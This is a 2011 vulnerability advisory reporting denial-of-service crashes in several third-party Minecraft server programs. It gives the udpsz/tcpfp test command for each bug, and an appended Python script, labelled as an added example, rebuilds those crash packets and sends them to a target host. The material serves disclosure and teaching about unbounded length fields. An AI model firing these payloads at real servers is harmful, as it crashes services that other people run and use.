#######################################################################

Luigi Auriemma

Applications: various
Versions:     refer to each single case; note that they were the latest
              versions at the moment of the tests
Platforms:    Windows and possibly others
Bugs:         multiple Denial of Service vulnerabilities
Exploitation: remote, versus server
Date:         27 Jun 2011 (found and reported on my forum 22 Feb 2011)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################


From http://old.zenhax.com/minecraft-day-t1769.html

Just a quick and dirty 5-minute check I did on some third-party server
software available for Minecraft (http://www.minecraft.net).
The following is the list of the problems found and, for each one, the
command needed to verify it (SERVER is the host under test):

=======================================================================

MCServer
http://www.mc-server.org/
version: r172

  http://SERVER:8080/aaaaaaaaaaaa...1000_'a's...aaa

  udpsz -C 027fff -b a -T SERVER 25565 0x8002

  udpsz -C 3b -b 0x7f -T SERVER 25565 0x8002

  udpsz -C "01 00000000" -b 0x30 -T SERVER 25565 0x6072

  udpsz -C 0d -b 0x00 -T SERVER 25565 42

=======================================================================

MCSharp
http://crafted.voziv.com/mcsharp/
version: 0.90

  tcpfp -m 80 -t 100 -f mcjoin.dat SERVER 25565

=======================================================================

MineServer
http://mineserver.be/
version: 20110214013000

  udpsz -C "01 00000008 0001 69 0001 69 0000000000000000 00" -b 0x0f -T SERVER 25565 36

=======================================================================

Opencraft
http://opencraft.sourceforge.net/
version: 0.3

  tcpfp -t 100 -f mcjoin.dat SERVER 25565

=======================================================================

All the problems are crashes (NULL pointer dereferences, invalid memory
accesses and the like) or CPU usage stuck at 100%.

Links to the tools used in the test:

  udpsz:      http://aluigi.org/testz/udpsz.zip
  tcpfp:      http://aluigi.org/fakep/tcpfp.zip
  mcjoin.dat: http://aluigi.org/poc/mcjoin.dat
              (it's just a normal and basic join packet)

=======================================================================
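The following is an added example, not part of the original advisory and not Auriemma's udpsz or tcpfp: it rebuilds the udpsz test packets listed above from their command lines, so the bytes can be inspected and replayed without the tool. It assumes that "udpsz -C HEX -b BYTE -T HOST PORT SIZE" sends HEX followed by BYTE repeated until the packet is SIZE bytes long, that "-b a" means the literal character 'a' (0x61), and that the leading bytes are Beta-era Minecraft packet ids (0x02 handshake with a 2-byte big-endian string length, 0x01 login, 0x0d player position and look); the function and case names are my own.

```python
# Added example (not the advisory's code, not udpsz): rebuild the udpsz
# payloads from the command lines so they can be inspected and replayed.
# Assumed udpsz semantics: CONTENT hex first, then FILL byte up to SIZE;
# "-b a" taken as the character 'a' (0x61).
import socket
import struct


def build_payload(content_hex: str, fill_byte: int, size: int) -> bytes:
    """Reproduce the udpsz -C/-b/SIZE layout: CONTENT first, then
    FILL_BYTE repeated until the packet is exactly SIZE bytes long."""
    content = bytes.fromhex(content_hex.replace(" ", ""))
    if len(content) > size:
        raise ValueError("content (%d bytes) longer than size %d"
                         % (len(content), size))
    return content + bytes([fill_byte & 0xFF]) * (size - len(content))


def claimed_string_len(payload: bytes) -> int:
    """For a Beta-era handshake (packet id 0x02, assumed) the next two
    bytes are the big-endian length of the username string.  Returns the
    length the packet announces, i.e. what the server will try to read
    or allocate, regardless of how many bytes actually follow."""
    if len(payload) < 3 or payload[0] != 0x02:
        raise ValueError("not a handshake packet")
    return struct.unpack(">H", payload[1:3])[0]


# The udpsz cases from the advisory as (content hex, fill byte, size).
# The packet-id comments are my reading of the 2011 Beta protocol.
TCP_CASES = {
    "mcserver-handshake": ("027fff", 0x61, 0x8002),      # 0x02, string len 0x7fff
    "mcserver-3b":        ("3b", 0x7f, 0x8002),          # unexpected id 0x3b
    "mcserver-login":     ("01 00000000", 0x30, 0x6072), # 0x01 login, version 0
    "mcserver-poslook":   ("0d", 0x00, 42),              # 0x0d position/look, zeroed
    "mineserver-login":   ("01 00000008 0001 69 0001 69 0000000000000000 00",
                           0x0f, 36),                    # 0x01 login, version 8
}


def http_case(path_len: int = 1000) -> bytes:
    """The MCServer web-interface request: a GET with a long path of 'a's
    (the advisory shows ~1000; the exact count is a parameter here)."""
    return b"GET /" + b"a" * path_len + b" HTTP/1.0\r\n\r\n"


def send_tcp(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Deliver one payload over TCP and return whatever the server answers
    before the timeout.  An empty reply, a reset, or the port no longer
    accepting connections afterwards is the usual sign the process died."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            return s.recv(4096)
        except (socket.timeout, ConnectionResetError):
            return b""


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3 or sys.argv[2] not in TCP_CASES:
        sys.exit("usage: %s SERVER CASE   (CASE is one of: %s)"
                 % (sys.argv[0], ", ".join(TCP_CASES)))
    host, name = sys.argv[1], sys.argv[2]
    content, fill, size = TCP_CASES[name]
    pkt = build_payload(content, fill, size)
    print("sending %d bytes, starting %s" % (len(pkt), pkt[:8].hex()))
    print("reply:", send_tcp(host, 25565, pkt))
```

Run it only against a server you own or are authorised to test. The useful thing to look at before sending anything is claimed_string_len(): the handshake case announces a 32767-character string inside a packet of 0x8002 bytes, which is exactly the kind of attacker-controlled length a parser must bound before reading or allocating.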